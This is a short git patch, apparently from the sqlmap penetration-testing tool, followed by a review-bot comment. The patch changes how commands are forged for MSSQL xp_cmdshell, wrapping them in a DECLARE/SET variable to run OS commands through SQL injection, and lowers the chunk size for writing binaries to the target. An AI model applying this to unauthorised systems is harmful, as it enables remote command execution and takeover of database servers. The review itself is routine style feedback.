From c7c84c3089e29564d24670542c662f2ae8756757 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Tue, 2 Nov 2010 15:31:51 +0000
Subject: [PATCH] Closes #111 (DECLARE/CHAR encode xp_cmdshell parameter in MSSQL).

---
 lib/takeover/xp_cmdshell.py | 9 +++++++--
 plugins/generic/filesystem.py | 2 +-
 2 files changed, 8 insertions(+), 3 deletions(-)

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 0df5e23e5..8d716b750 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -13,6 +13,7 @@
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.unescaper import unescaper
 from lib.request import inject
 from lib.techniques.blind.timebased import timeUse
@@ -96,9 +97,13 @@ class xp_cmdshell:
 return False
 
 def xpCmdshellForgeCmd(self, cmd):
-forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+self.__randStr = randomStr(lowercase=True)
+self.__cmd = unescaper.unescape("'%s'" % cmd)
+self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
+self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
+self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
-return forgedCmd
+return self.__forgedCmd
 
 def xpCmdshellExecCmd(self, cmd, silent=False):
 cmd = self.xpCmdshellForgeCmd(cmd)
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index c71a5b72a..bacab0ce0 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -192,7 +192,7 @@ class Filesystem:
 forgedScrLines = []
 cmd = ""
 charCounter = 0
-maxLen = 4096
+maxLen = 512
 logger.debug("generating binary file %s\%s, wait.." % (tmpPath, chunkName))
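Review bot: The three temporaries introduced in xpCmdshellForgeCmd (`self.__randStr`, `self.__cmd`, `self.__forgedCmd`) are used only inside this method, so they should be plain locals rather than name-mangled instance attributes that outlive the call and are overwritten on every invocation; `randStr = randomStr(lowercase=True)`, `forgedCmd = "DECLARE @%s VARCHAR(8000); " % randStr` and `return forgedCmd` is the same logic without the leaked state. The hard-coded VARCHAR(8000) is undocumented and means a command longer than 8000 characters is silently truncated at the SET; a comment such as `# VARCHAR(8000) is the largest fixed-size SQL Server varchar; longer commands are cut off` would make that limit explicit to the next maintainer. randomStr is not imported in the visible hunks, so presumably it comes from an import earlier in the file; worth confirming it is in scope. The same instance-attribute style does not appear in the other hunks, so this note applies only here.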